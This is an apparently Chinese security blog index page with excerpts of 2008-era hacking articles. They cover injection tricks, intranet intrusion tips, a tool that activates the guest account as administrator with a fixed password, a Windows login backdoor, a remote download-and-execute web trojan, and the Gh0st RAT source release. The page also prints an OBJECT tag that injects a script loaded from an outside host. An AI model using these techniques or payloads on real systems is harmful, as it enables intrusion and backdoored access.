鬼仔's Blog

作者：lcx
来源：vbs小铺

《黑客手册200802》
我在入侵过程中注意到的细节（二）
lcx

上期我写的基本都是在入侵内网过程中要注意到的细节，不过现在流行的毕竟是注入了。现在常规注入针对的也就是asp、php、jsp、cfm、 cgi等的动态脚本。针对各种脚本的话，如果注意一些细节，像构造特殊字符，也会起到很奇妙的作用。像最早的%5c暴库、%00截断都是轰动一时的漏洞。这些漏洞被发现，无非是发现都对脚本语言的一些细节的重视。那么这一期我就来讲一下我会在注入过程中注意到的一些细节，主要是讲一些特殊符号了。
阅读全文 »

作者：lcx
来源：vbs小铺

《黑客手册200801》
我在入侵过程中注意到的细节（一）
lcx

细节决定成败，不但对于写程序、渗透入侵甚至人生都是如此。谈人生就有点深奥了，还是来谈谈入侵吧。记得很久前有一位同事，注入的时候，在sa权限什么命令都能执行的情况下竟然入侵花费了三天左右的时间，为什么呢？这是因为他在NBSI下输了个time命令，想看下服务器的时间，结果命令无法应答，注入点宕在哪儿了，再也没办法执行其它命令了，直到服务器重启。有的写的不好的木马，如果执行time命令也会自动退出。如果注意到了这个细节的话，最好的执行办法就是time /t。
这一期我不谈注入，针对我在内网入侵的经验，来谈一下细节吧。
阅读全文 »

作者：lcx
来源：vbs小铺

给黑手专栏里写的文章

批处理的api–WMIC学习体会
lcx

上期的专栏里，NP给大家写了一篇很精彩也很有实际应用效果的批处理教程。这期，我给大家讲一下最近我学习wmic的体会。在这篇文章里也许你看不 到很多奇特有用的的实际例程，但是呢，授人以鱼不如授人以渔，希望我的文章能让你通俗易懂的了解一些wmic的基本知识，可以有一个学习的兴趣，让自己继 续深研一下wmic。
阅读全文 »

作者：cooldiyer
来源：红狼

很早时候写的,方便大家用,代码丢了我也可以百度到
编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组
并且可以多用户登录
声明,原创………………..
阅读全文 »

鬼仔注：在7j那里看到的。

来源：看雪学院
作者：clyfish

windows有通用密码吗？
去问比尔大叔吧。

先不管是不是真的有，我们可以自己实现一个这样的后门。

先简单介绍一下windows登陆过程中的一些过程。
winlogon进程用gina.dll获取用户名和密码，通过LPC传给lsass进程。
然后lsass进程调用默认认证包msv1_0.dll来验证密码的对错。
而msv1_0则从SAM中获得用户的信息，包括密码的哈希。
阅读全文 »

鬼仔注：这个漏洞。

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign
2008-5-24
http://www.scanw.com/blog

哈哈。标题吸引吗。
修改代码请注意不能使用双引号”，注意不能跨域，还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马，只好拿鸡PP搓成鸡胸，这样垃圾的漏洞才能放出来~哈哈。
阅读全文 »

鬼仔注：Gh0st从2.5之后就不开源了，现在3.6又开了。

下载地址：gh0st3.6_src.rar

再来一个长长的更新列表：
阅读全文 »

作者：余弦
来源：0×37 Security

Microsoft word javascript execution原文：http://marc.info/?l=bugtraq&m=121121432823704&w=2，hi群内讨论过。可以得出一些结论：

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能，使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code：

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »